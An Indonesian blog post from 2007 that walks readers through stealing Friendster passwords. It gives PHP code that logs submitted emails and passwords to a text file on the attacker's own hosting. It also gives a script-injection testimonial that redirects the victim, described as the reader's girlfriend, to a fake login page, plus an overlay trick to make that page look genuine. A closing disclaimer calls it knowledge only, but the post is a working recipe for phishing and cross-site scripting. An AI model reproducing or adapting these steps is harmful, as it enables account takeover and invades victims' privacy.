Tuesday, 9 October 2007

Cara untuk mendapatkan password di Friendster




Saya sudah sejak lama mempunyai beberapa artikel tentang teknik mendapatkan password di Friendster dan Yahoo Messenger,Salah satu yang akan diuraikan disini adalah dengan cara untuk mendapatkan password pada Friendster yang banyak saya ketahui di situs-situs underground,terus terang saya tidak terlalu tertarik untuk menuliskan hal ini,tapi sekedar untuk memperluas pengetahuan tentang computer maka saya akan mencoba mengurai salah satu artikel dari beberapa teknik yang saya miliki,teknik ini hampir sama dengan cara untuk mendapatkan password Yahoo Messenger yang menggunakan O-matic yang telah saya uji coba ke ampuhannya, semoga bermanfaat bagi pembaca blog Auto Computer :

Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui teknik ini. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!! STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot ingin meneruskan saya tidak bisa memaksa anda...

Lanjutt ....

Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat. Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat ngedapetin password, cookies, or perhatian lebih dari doi ama kita ;)) n laen-laen .. :P .

So langsung saja kita menuju acara puncak ...

Pertama-tama yg mesti kita siapin :

1. Teh manis penghangat malam.
2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk ...
3. Web Hosting yg support PHP. Cari di paman Google banyak..
4. Upload file index.htm (ada di source).

5. Sertakan code php dan JavaScript di bawah ini dan " SAVE As " sesuai dg nama link yg dituju pada Form Login.


$email = $_POST[email];
$password = $_POST[password];
$fl = fopen('password.txt', 'a');
fwrite($fl, "$email . $password \n\n");
fclose($fl);

?>


Dan upload file diatas ke www.webyangsupportphp.com


6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.


7. kirim testi dg :

hai syang .. gimna kabarna, kagen nie ..< > window.location=" http://webyangsupportphp.com/index.htm";< >kpn ke Jogja

catatan : dengan menambahkan kata "script" didalam tanda kurung pertama dan "/script" pada tanda kurung kedua.

nah .. Setelah sang pacar penerima testi membuka "New Testimonials", maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan jasanya untuk sang do'i... :P =] )

Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan " OVERLAY GENERATOR " pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php

Download Index.html
Kesimpulan :

# Hacking tidak selamanya menggunakan " TOOLS "
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!

(Penerapan Social Engineering untuk mendapatkan password di Friendster
Oleh numpang_lewat)